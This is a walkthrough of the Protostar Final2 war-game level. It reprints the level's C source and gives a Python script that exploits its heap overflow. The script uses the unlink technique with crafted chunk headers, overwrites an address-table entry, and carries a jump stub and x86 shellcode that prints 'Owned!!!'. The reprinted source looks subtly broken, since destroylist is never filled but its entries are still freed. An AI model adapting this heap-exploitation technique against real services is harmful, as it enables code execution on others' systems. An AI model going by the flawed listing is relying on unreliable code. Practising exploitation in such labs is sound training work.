Binary Exploitation Protostar Final2 - Walkthrough

Namaste Friends,



Today, in this post, I am going to share my walkthrough of the Exploit Exercises Protostar Final2 level.


Before starting our walkthrough, let's take a look at the hints and details.

Note: I want to highlight a few points.

  • I'm not the creator of the Protostar war game; I am just a player.
  • Here I am just providing hints and references, so if you feel stuck anywhere, take a look here.
  • Understand all previous levels before starting this one.
  • Do some research on assembly, C/C++ and GDB.
  • Do some research on heap overflow exploitation.
  • All credit for the Exploit Exercises war games goes to exploit-exercises.com.

Let's start.

Source Code



#include "../common/common.c"
#include "../common/malloc.c"

#define NAME "final2"
#define UID 0
#define GID 0
#define PORT 2993

#define REQSZ 128

void check_path(char *buf)
{
  char *start;
  char *p;
  int l;

  /*
  * Work out old software bug
  */

  p = rindex(buf, '/');
  l = strlen(p);
  if(p) {
      start = strstr(buf, "ROOT");
      if(start) {
          while(*start != '/') start--;
          memmove(start, p, l);
          printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
          "yes" : "no", start - buf);
      }
  }
}

int get_requests(int fd)
{
  char *buf;
  char *destroylist[256];
  int dll;
  int i;

  dll = 0;
  while(1) {
      if(dll >= 255) break;

      buf = calloc(REQSZ, 1);
      if(read(fd, buf, REQSZ) != REQSZ) break;

      if(strncmp(buf, "FSRD", 4) != 0) break;

      check_path(buf + 4);     

      dll++;
  }

  for(i = 0; i < dll; i++) {
      write(fd, "Process OK\n", strlen("Process OK\n"));
      free(destroylist[i]);
  }
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *username;

  /* Run the process as a daemon */
  background_process(NAME, UID, GID); 
  
  /* Wait for socket activity and return */
  fd = serve_forever(PORT);

  /* Set the client socket to STDIN, STDOUT, and STDERR */
  set_io(fd);

  get_requests(fd);

}

Hint



Remote heap level :)

Core files will be in /tmp.

This level is at /opt/protostar/bin/final2

Vulnerable Function



  /*
  * Work out old software bug
  */

  p = rindex(buf, '/');
  l = strlen(p);
  if(p) {
      start = strstr(buf, "ROOT");
      if(start) {
          while(*start != '/') start--;
          memmove(start, p, l);
          printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
          "yes" : "no", start - buf);
      }

Planning

Well, solving this challenge was really fun. As we can see, there is no need to hunt for the vulnerable function, and if you have honestly worked through the heap levels, this level is just a piece of cake.
Nothing more!

Exploit



import struct
import socket

# Total buffer: 128 bytes
# ==========================================
# |  Buff(128)   | -8(4) | -4 |  FD  |  BK |
# ==========================================


# First Buff
payload = 'FSRDBBBB'


# mov eax, 0x0804e098 ; jmp eax  (7 bytes)
payload+= '\xB8\x98\xE0\x04\x08\xFF\xE0'

# Alternative stubs that were tried:
# '\xB8\xB2\xE0\x04\x08\xFF\xE0'  # mov eax, 0x0804e0b2 ; jmp eax
# '\xB8\xAE\xE0\x04\x08\xFF\xE0'  # mov eax, 0x0804e0ae ; jmp eax
# '\x68\xAE\xE0\x04\x08\xC3'      # push 0x0804e0ae ; ret -- limited size (8 bytes) for this stub


payload+= 'B'*(128-len(payload)-1)
payload+= '/'
payload1 = payload


# Second Payload
payload = 'FSRD'
payload+= 'ROOT'
payload+= '\x90'*4
payload+= '/'
payload+= struct.pack("i", -8)
payload+= struct.pack("i", -4)
payload+= struct.pack("i",0x0804d41c-12) # FD
payload+= struct.pack('I', 0x804e010)  # Bk


"""
0:  31 c0                   xor    eax,eax
2:  31 db                   xor    ebx,ebx
4:  31 c9                   xor    ecx,ecx
6:  31 d2                   xor    edx,edx
8:  b0 04                   mov    al,0x4
a:  b3 01                   mov    bl,0x1
c:  68 64 21 21 21          push   0x21212164
11: 68 4f 77 6e 65          push   0x656e774f
16: 89 e1                   mov    ecx,esp
18: b2 08                   mov    dl,0x8
1a: cd 80                   int    0x80
1c: b0 01                   mov    al,0x1
1e: 31 db                   xor    ebx,ebx
20: cd 80                   int    0x80

"""

shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x68\x64\x21\x21\x21\x68\x4f\x77\x6e\x65\x89\xe1\xb2\x08\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
payload+= '\xeb\x0f'   # jmp short +0x0f, lands inside the NOP sled
payload+= '\x90'*20    # 20 NOP (0x90) bytes; shellcode follows
payload+= shellcode

payload+= '\xcc'*(128-len(payload))
print payload1+payload


For a more detailed walkthrough, check the YouTube video playlist provided below.

